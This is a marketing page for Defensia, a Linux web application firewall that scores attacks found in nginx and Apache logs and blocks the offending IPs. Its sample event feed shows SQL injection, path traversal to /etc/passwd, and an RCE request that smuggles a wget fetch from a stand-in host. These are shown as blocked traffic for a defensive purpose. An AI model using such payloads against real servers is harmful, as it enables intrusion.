Web Application Firewall · Linux · Zero Config

Web Application Firewall
for Linux servers

Defensia reads your nginx and Apache access logs in real time. When it detects SQL injection, path traversal, RCE, or other OWASP attacks, it blocks the IP automatically — before they try again.

Try WAF Free →

WAF Events — srv-prod-01● LIVE

BLOCKED185.220.101.7sql_injectionGET /search?q=' OR 1=1--

BLOCKED45.83.64.11path_traversalGET /../../../etc/passwd

BLOCKED103.145.13.90scannerGET /wp-login.php

BLOCKED91.108.4.30rcePOST /cgi-bin/; wget http://evil.sh

LOGGED34.89.114.1bot_crawlGET /robots.txt (Googlebot)

15 OWASP attack types detected

Every detection uses a cumulative scoring engine — repeated attacks from the same IP escalate the response.

Attack Type	Default Score	Detection Method
RCE / Web Shell / Shellshock	+50	Score-based
Scanner User-Agent (sqlmap, nikto...)	+50	Score-based
SQL Injection	+40	Score-based
SSRF	+40	Score-based
Web Exploit (Spring4Shell, Log4Shell...)	+40	Score-based
Honeypot Trap	+40	Score-based
Path Traversal	+30	Score-based
Header Injection	+30	Score-based
WordPress Brute Force	+30	Threshold (10 req / 2 min)
XSS	+25	Score-based
.env Probe	+25	Score-based
XMLRPC Abuse	+25	Threshold
Config Probing	+20	Score-based
Scanner Pattern	+20	Score-based
404 Flood	+15	Threshold (30 req / 5 min)

Score ≥ 80 → IP blocked for 1 hour · Score ≥ 100 → blacklisted for 24 hours. All thresholds configurable per server.

How the WAF works

No inline proxy. No traffic redirection. Defensia reads your existing web server logs directly.

STEP 1

Auto-detects your logs

Runs nginx -T and apachectl -S to find all vhosts and log paths. Also detects logs inside Docker containers via bind mounts.

STEP 2

Scores each request

Each suspicious request adds points to the attacker's IP score. Repeated attacks escalate the score toward a block threshold.

STEP 3

Blocks with ipset

When a score threshold is crossed, the IP is added to an ipset rule. The block is instant and propagated to all your servers.

Configurable from the dashboard

Every attack type can be tuned per server. No config files on the server.

✓

Enable / disable per attack type

Turn off wp_bruteforce on non-WordPress servers. No restarts needed.

✓

Custom score weights

Set SQL injection to 80 for instant-block on first detection. Or set 404_flood to 0 to ignore it.

✓

Detect-only mode

Log attacks without blocking. Useful for auditing before enforcement.

✓

Custom thresholds

Override the req/min thresholds for wp_bruteforce, 404_flood, and xmlrpc per server.

Add WAF to your server today

One command installs the agent. WAF is included in the Pro plan.

See Pricing Start Free

Web Application Firewallfor Linux servers